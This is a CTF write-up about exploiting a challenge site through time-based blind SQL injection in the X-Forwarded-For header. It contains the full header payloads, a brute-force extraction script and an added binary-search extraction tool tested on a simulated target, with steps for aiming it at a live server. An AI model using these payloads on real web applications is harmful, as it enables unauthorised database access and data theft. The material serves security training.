Opening the link shows the following content:
Analysis: the first thought is that this is an IP-spoofing challenge, so try the HTTP headers used to fake the client IP (X-Forwarded-For and the like). Spoofing the header from Burp works, as shown below:
Response:
So the spoof goes through, but the SQL statements shown in the response look stringified: the header value is simply carried inside a string literal, and nothing in the output changes in a way that could be used to judge a true/false condition. What next?
Time-based blind injection?!
Using a select case when () then ... end statement, the difference in response time tells us the length of the database name, the table names, the column names and so on. The blind-injection payloads are as follows:
```python
import string
import time

import requests

URL = "http://target/"  # challenge URL, not given in the write-up
CHARSET = string.ascii_letters + string.digits + "{}_-;,"


def is_slow(header):
    """Send the injected header once; True when the sleep(6) branch fired."""
    start = time.time()
    requests.get(URL, headers=header, timeout=20)
    return time.time() - start > 5


# The earlier stages were run the same way and are left commented out, as in
# the original: each payload is formatted with the current i (and j) and
# assigned to `header` in the loop below.
# length of database
# header = {"X-Forwarded-For": "'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i}
# name of database
# header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
# length of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')"
#                              " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
# length of column
# header = {
#     "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') "
#                        "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') "
#                        "then sleep(6) else 0 end) and 'a'='a" % i}
# name of column
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')"
#                              " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
# length of flag
# header = {
#     "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
#                        "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}

# name of flag: guess character j at position i; a slow response confirms the guess
flag = ""
for i in range(1, 64):
    for j in CHARSET:
        header = {
            "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
                               "from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
        if is_slow(header):
            flag += j
            print(flag)
            break
    else:
        break  # no character matched at this position: end of the string
print("flag:", flag)
```
Result:
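As an added example (not code from the original write-up), here is the extraction end to end: the same case when / sleep payload shape sent through X-Forwarded-For, a timing oracle built on top of it, and a binary search over the string length and each character's ASCII code instead of the write-up's one-request-per-charset-entry guessing. The target is a constructed sqlite stand-in for the challenge's MySQL backend (it registers sleep(), database() and ascii(), which sqlite lacks, so the MySQL-style payloads run unchanged); the flag value and the web4 database name are assumptions, and the delay is shortened from 6 s to 0.05 s so the whole run finishes offline in a few seconds.

```python
import sqlite3
import time

# On the real target the injected sleep(6) costs six seconds per request; the
# simulation shortens it so the whole extraction runs in a few seconds.
DELAY = 0.05
THRESHOLD = DELAY / 2   # a response slower than this means the CASE branch fired


class SimulatedTarget:
    """Constructed stand-in for the challenge backend (the real one is MySQL).

    It logs the client IP taken from X-Forwarded-For by string-concatenating
    the header into an INSERT, which is the bug the write-up exploits.
    """

    def __init__(self, flag):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE access_log (ip TEXT)")
        self.conn.execute("CREATE TABLE flag (flag TEXT)")
        self.conn.execute("INSERT INTO flag VALUES (?)", (flag,))
        # MySQL built-ins that sqlite lacks, registered so the same payloads work.
        self.conn.create_function("sleep", 1, self._sleep)
        self.conn.create_function("database", 0, lambda: "web4")   # assumed name
        self.conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)

    @staticmethod
    def _sleep(seconds):
        time.sleep(seconds)
        return 0

    def request(self, headers):
        ip = headers.get("X-Forwarded-For", "127.0.0.1")
        # Vulnerable: the header value is concatenated straight into the statement.
        self.conn.execute("INSERT INTO access_log (ip) VALUES ('%s')" % ip)


def build_header(condition):
    """Same payload shape as the write-up: close the quote, inject a CASE that
    sleeps only when `condition` holds, then re-balance with and 'a'='a."""
    payload = "'+(select case when(%s) then sleep(%s) else 0 end) and 'a'='a" % (
        condition, DELAY)
    return {"X-Forwarded-For": payload}


def timing_oracle(target):
    """Turn the request into a boolean oracle: True iff the response was slow."""
    def oracle(condition):
        start = time.monotonic()
        target.request(build_header(condition))
        return time.monotonic() - start >= THRESHOLD
    return oracle


def extract(oracle, expr, max_len=64):
    """Recover the string value of SQL expression `expr` from the oracle.

    Binary search first on the length (<= max_len), then on the ASCII code of
    each character in the printable range 32..126: about 7 requests per
    character instead of one per charset entry, which matters when every
    true branch costs several seconds.
    """
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if oracle("length((%s))>=%d" % (expr, mid)):
            lo = mid
        else:
            hi = mid - 1
    length = lo

    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("ascii(substr((%s),%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    oracle = timing_oracle(SimulatedTarget("flag{constructed}"))
    print(extract(oracle, "database()"))
    print(extract(oracle, "(select group_concat(flag) from flag)"))
```

Against the real target, replace SimulatedTarget.request with an HTTP request carrying the header and go back to the write-up's sleep(6) with a threshold of around 5 s; substr, length, ascii and group_concat are all valid MySQL as written. The threshold has to sit well above normal latency jitter, otherwise a slow network round-trip is read as a true branch and corrupts every later character.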